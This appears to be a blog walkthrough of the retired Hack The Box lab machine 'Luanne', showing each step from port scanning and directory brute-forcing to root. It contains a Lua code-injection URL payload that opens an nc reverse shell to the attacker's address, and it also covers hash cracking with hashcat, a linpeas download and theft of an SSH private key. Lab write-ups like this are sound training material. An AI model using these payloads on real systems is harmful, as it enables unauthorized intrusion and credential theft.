Luanne Walkthrough ️
☠️ Hack The Box ☠️
Hello everyone..!! This is Walkthrough of the Luanne Machine which is now retired . Luanne Machine is rated difficulty level as easy , its release date is 28 Nov 2020 and retired date is 27 Mar 2021. Ip of the machine is 10.10.10.218 . Let Start…
Port Scanning : Nmap
Command :
nmap -v -sC -sT -sV -A -p- 10.10.10.218Output :
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp open http nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/27%OT=22%CT=1%CU=31120%PV=Y%DS=2%DC=T%G=Y%TM=605E2D9
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=D8%GCD=1%ISR=DC%TI=Z%CI=Z%II=I)OPS(O1=M54
OS:DNW3ST11%O2=M54DNW3ST11%O3=M54DNW3NNT11%O4=M54DNW3ST11%O5=M54DNW3ST11%O6
OS:=M54DST11)WIN(W1=8000%W2=8000%W3=8000%W4=8000%W5=8000%W6=8000)ECN(R=Y%DF
OS:=Y%T=40%W=8000%O=M54DNW3SLL%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%
OS:Q=)T2(R=Y%DF=N%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=8000%
OS:S=O%A=S+%F=AS%O=M54DNW3ST11%RD=0%Q=)T4(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%
OS:RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=FF%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=FF%CD=S)Uptime guess: 0.001 days (since Sat Mar 27 00:21:41 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=213 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsdTRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 216.70 ms 10.10.14.1
2 216.88 ms luanne.htb (10.10.10.218)NSE: Script Post-scanning.
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2786.73 seconds
Raw packets sent: 94 (7.522KB) | Rcvd: 172 (36.766KB)
Port 80 Enumeration
From the port scanning we come to know about that the port 80 is open whics is assigned for http ( web service ) . On visiting to the port 80 we find that there is a basic authentication is put up for the web page .
After that i want to see source code of the page but there also it want username and password . Next step is directory bruteforcing.
Command :
dirsearch -u http://10.10.10.218/ -EOutput :
_|. _ _ _ _ _ _|_ v0.4.0
(_||| _) (/_(_|| (_| )Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 20 | Wordlist size: 10023Error Log: /root/dirsearch/logs/errors-21–03–26_23–40–21.logTarget: http://10.10.10.218/Output File: /root/dirsearch/reports/10.10.10.218/_21–03–26_23–40–22.txt[23:40:22] Starting:
[23:41:38] 200–612B — /index.html
[23:42:01] 200–78B — /robots.txtTask Completed
Here we found robots.txt, let see the content of robots.txt file
There is entry of weather directory and also a comment which gives us hint that on weathr directory there is 404 but still something is present on it , so now we have to visit on /weather directory.
As they said there is 404. But according to their hint something is present in directory , again we move toward the directory bruteforcing inside weather directory.
Command:
dirsearch -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.218/weather -EOutput :
dirsearch -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.218/weather/ -E_|. _ _ _ _ _ _|_ v0.4.0
(_||| _) (/_(_|| (_| )Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 20 | Wordlist size: 220520Error Log: /root/dirsearch/logs/errors-21–03–27_00–19–22.logTarget: http://10.10.10.218/weather/Output File: /root/dirsearch/reports/10.10.10.218/weather_21–03–27_00–19–22.txt[00:19:22] Starting:
[00:20:47] 200–90B — /weather/forecast
CTRL+C detected: Pausing threads, please wait…
We find forecast directory inside the weather and also we get hint to move forward, which is city=list.
Now we have to pass the city variable with list parameter as we seen in forecast page .
http://10.10.10.218/weather/forecast?city=listOutput :
we get city name list to pass into the city .
http://10.10.10.218/weather/forecast?city=LondonOutput :
We could not found any interesting thing inside this city name . On passing single quote there is some error .
http://10.10.10.218/weather/forecast?city=London’output :
Error is about the Lua script . Let search for the Lua on gtfobins
https://gtfobins.github.io/#
we found a function through which we can execute system command. From the output of nmap we come to know that the OS is running on this machine is openBSD . Now search for reverse shell for openBSD on github.
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.mdOn this website we find all the oneliner reverse shell . We get reverse shell for BSD .
Now we have to make a payload to get the reverse shell.
http://10.10.10.218/weather/forecast?city=London‘);os.execute(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.112 4455 >/tmp/f”)-- Here,
10.10.14.112 : Localhost of htb
4455 : port to get the reverse connection.
Now encrypt the payload.
http://10.10.10.218/weather/forecast?city=London%27)%3Bos.execute(%22rm%20%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.112%204455%20%3E%2Ftmp%2Ff%22)--Start the Listner on port 4455
nc -nlvp 4455
Now visit to the encrypted url and grab the shell.
We get shell of _httpd user.
On visiting home directory we find that there is 1 user r.michaels
I find .htpasswd file on analysing /var/www directory
$ cd /var/www$ ls -lah$ cat .htpasswd
We get a username and password hash .
To identify hash we use hash-identifier
We come to know that the hash is MD5(unix).
Now we have to crack the hast using hashcat.
hashcat --help | grep -i unix
500 is our hash number.
Now make ka file and put our hash inside it. for example : hash.txt
Run the following command to crack the hash .
hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txtOn completing this command run :
hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt --show
password for the hash is iamthebest
Now we have valid credentials .
webapi_user : iamthebest
This successfully work on the port 80 basic authentication , but htere is nothing special found.
Remember that ,on port 80 when we cancle the authentication then there is address 127.0.0.1:300 According to this run the command
netstat -an
we found port 3000 and 3001 is running locally .
I have putted linpeas.sh script on the shell using curl
curl http://10.10.14.112/linpeas.sh --output /tmp/linpeas.shchmod +x linpeas.sh./linpeas.sh
I get interesting thing which give me idea to use curl command.
r.michaels 185 0.0 0.0 35268 2008 ? Is 5:57AM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/wwwNow we use curl command to grab the ssh private key of the user
curl --user webapi_user:iamthebest 127.0.0.1:3001/~r.michaels/id_rsa
Finally we get the ssh private key.
Come back to your attacker pc make a file id_rsa and and puth the whole key inside it . Give the permission of 600 to id_rsa and now our key is ready .
# vim id_rsa (put the key inside it)# chmod 600 id_rsa
Now login to ssh for user r.michaels using id_rsa
ssh -i id_rsa r.michaels@10.10.10.218
We get the user shell. Grab the user flag.
Now we have to root the machine.
On analysing directiories again I found hash inside /var/www/.htaccess
Crack the hash same as privious hash and we get the password littlebear
Now try this password to root the machine.Run the following command
doas suEnter the password : littlebear
Finally we get root shell. Grab the root flag /root/root.txt and submit it .
And the happiness of seeing this window is on next leve 😍😍.
HAPPY HACKING…!!
Thank You for reading this blog.
If you have any Doubt regarding this then feel free to contact with me
You can contact me on linkedin and twitter